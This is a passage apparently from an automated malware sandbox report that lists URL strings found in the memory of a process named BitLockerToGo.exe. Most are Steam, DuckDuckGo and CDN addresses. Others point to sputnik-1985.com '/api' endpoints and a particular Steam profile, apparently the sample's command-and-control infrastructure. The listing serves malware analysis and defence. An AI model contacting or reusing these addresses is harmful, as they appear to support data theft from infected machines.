              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345639041.0000000003459000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=M_FULq_A
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345639041.0000000003459000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=aep8
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=VsdTzPa1YF_Y&l=e
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
              Source: BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=en
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
              Source: BitLockerToGo.exe, 00000003.00000003.2345639041.00000000034A9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356666158.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com~T
              Source: BitLockerToGo.exe, 00000003.00000003.2357767548.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357865261.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357621747.0000000005ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: BitLockerToGo.exe, 00000003.00000003.2357767548.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357865261.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357621747.0000000005ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: BitLockerToGo.exe, 00000003.00000003.2357767548.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357865261.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357621747.0000000005ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
              Source: BitLockerToGo.exe, 00000003.00000003.2345639041.00000000034A9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356666158.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.st~Z
              Source: BitLockerToGo.exe, 00000003.00000003.2432696708.00000000034A8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2411433910.0000000003497000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.sbZ
              Source: BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
              Source: BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
              Source: BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
              Source: BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
              Source: BitLockerToGo.exe, 00000003.00000003.2356666158.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.0Z
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
              Source: BitLockerToGo.exe, 00000003.00000003.2454185919.0000000003463000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345639041.00000000034A9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2455088061.0000000003463000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2385447737.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2454654141.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2432642292.00000000034FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2454541108.00000000034EE000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2384397075.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2444465530.00000000034FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2455429001.00000000034F4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2383919449.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2383640703.0000000005AFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/
              Source: BitLockerToGo.exe, 00000003.00000003.2356666158.0000000003490000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/))Y
              Source: BitLockerToGo.exe, 00000003.00000003.2406591034.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2408526082.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2400912945.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2400982602.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2411084940.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2401038884.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2400826255.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2399949017.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2400658474.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2398677868.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2432387168.0000000005AFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com//
              Source: BitLockerToGo.exe, 00000003.00000003.2432642292.00000000034FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/6
              Source: BitLockerToGo.exe, 00000003.00000003.2432642292.00000000034FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2444465530.00000000034FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/F
              Source: BitLockerToGo.exe, 00000003.00000003.2432387168.0000000005AFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/K
              Source: BitLockerToGo.exe, 00000003.00000003.2454185919.0000000003463000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2455088061.0000000003463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/U70
              Source: BitLockerToGo.exe, 00000003.00000003.2345639041.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/Y
              Source: BitLockerToGo.exe, 00000003.00000003.2432642292.00000000034FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2455263174.000000000349B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2454541108.00000000034EE000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356666158.000000000349C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2444465530.00000000034FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2454685450.00000000034A5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2455263174.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2455429001.00000000034F4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2411433910.0000000003497000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2455377451.00000000034EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/api
              Source: BitLockerToGo.exe, 00000003.00000002.2455263174.000000000349B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/apiY
              Source: BitLockerToGo.exe, 00000003.00000003.2454654141.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2432642292.00000000034FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2454541108.00000000034EE000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2444465530.00000000034FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2455429001.00000000034F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/apiate
              Source: BitLockerToGo.exe, 00000003.00000003.2432642292.00000000034FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2444465530.00000000034FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/n
              Source: BitLockerToGo.exe, 00000003.00000003.2454654141.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2432642292.00000000034FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2454541108.00000000034EE000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2444465530.00000000034FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2455429001.00000000034F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/v
              Source: BitLockerToGo.exe, 00000003.00000003.2454654141.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2432642292.00000000034FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2454541108.00000000034EE000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2444465530.00000000034FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2455429001.00000000034F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com/~
              Source: BitLockerToGo.exe, 00000003.00000003.2432562158.00000000034EA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2432642292.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sputnik-1985.com:443/api
              Source: BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
              Source: BitLockerToGo.exe, 00000003.00000003.2345639041.00000000034A9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356666158.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambr.T
              Source: BitLockerToGo.exe, 00000003.00000003.2345639041.00000000034A9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356666158.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized
              Source: BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
              Source: BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
              Source: BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
              Source: BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356623216.00000000034F6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345639041.0000000003459000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
              Source: BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
              Source: BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
